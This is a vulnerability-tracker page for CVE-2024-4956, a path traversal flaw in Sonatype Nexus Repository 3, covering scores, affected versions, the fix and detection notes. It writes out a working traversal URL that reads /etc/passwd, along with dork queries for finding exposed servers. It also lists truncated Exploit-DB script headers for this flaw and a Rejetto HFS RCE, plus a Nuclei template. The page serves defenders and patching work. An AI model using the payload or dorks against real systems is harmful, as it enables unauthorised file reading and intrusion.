CVE-2024-4956
published 2024-05-16CVE-2024-4956: Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
PriorityP270high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
18.25%
96.9th percentile
Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonatype | nexus_repository | 3.0.0 – 3.68.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd↗
yara↗
regex('root:.*:0:0:', body) AND contains(header, "application/octet-stream") AND status_code == 200- →Successful exploitation returns HTTP 200 with Content-Type header 'application/octet-stream' and body matching regex 'root:.*:0:0:' (contents of /etc/passwd). ↗
- →The exploit fingerprints vulnerable Nexus instances via Google Dork: header="Server: Nexus/3.53.0-01 (OSS)" and FOFA queries on title="Nexus Repository Manager". ↗
- →FOFA queries used to identify exposed Nexus instances: title="Nexus Repository Manager" or title="nexus repository manager". ↗
- →The exploit filters out false positives by checking that the response does NOT contain the string 'nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false', 'Not Found', or '400 Bad Request', but DOES contain 'root'. ↗
- →Attack is unauthenticated and uses URL-encoded path traversal sequences (multiple leading %2F slashes followed by ..%2F sequences) in a plain HTTP GET request — no special headers or authentication required. ↗
- ·The vulnerability is fixed in Sonatype Nexus Repository 3 version 3.68.1 and later; instances running versions prior to 3.68.1 are affected. ↗
- ·The exploit was specifically tested against version 3.53.0-01 on Ubuntu 20.04, but the vulnerability affects the broader Nexus Repository 3 product line below 3.68.1. ↗
- ·EPSS score of 0.94028 (99.9th percentile) indicates extremely high likelihood of exploitation in the wild; treat as actively exploited. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sonatype Nexus Repository 3.53.0-01 - Path Traversal
exploitdb·2025-03-28·CVSS 7.5
CVE-2024-4956 [HIGH] Sonatype Nexus Repository 3.53.0-01 - Path Traversal
Sonatype Nexus Repository 3.53.0-01 - Path Traversal
---
# Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal
# Google Dork: header="Server: Nexus/3.53.0-01 (OSS)"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-4956
# Vendor Homepage: https://www.sonatype.com/nexus-repository
# Software Link: https://www.sonatype.com/nexus-repository
# Version: 3.53.0-01
# Tested on: Ubuntu 20.04
# CVE: CVE-2024-4956
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_co
Exploit-DB
Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
exploitdb·2025-03-28·CVSS 9.8
CVE-2024-23692 [CRITICAL] Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
---
# Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
Nuclei
Sonatype Nexus Repository Manager 3 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2024-4956 [HIGH] Sonatype Nexus Repository Manager 3 - Local File Inclusion
Sonatype Nexus Repository Manager 3 - Local File Inclusion
Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
Template:
id: CVE-2024-4956
info:
name: Sonatype Nexus Repository Manager 3 - Local File Inclusion
author: ritikchaddha
severity: high
description: |
Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
impact: |
Unauthenticated attackers can read arbitrary system files via path traversal in Sonatype Nexus Repository.
remediation: |
Update Sonatype Nexus Repository 3 to version 3.68.1 or later.
reference:
- https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg
- https://nvd.nist.gov/vuln/detail/CVE-20
No writeups or analysis indexed.
2024-05-16
Published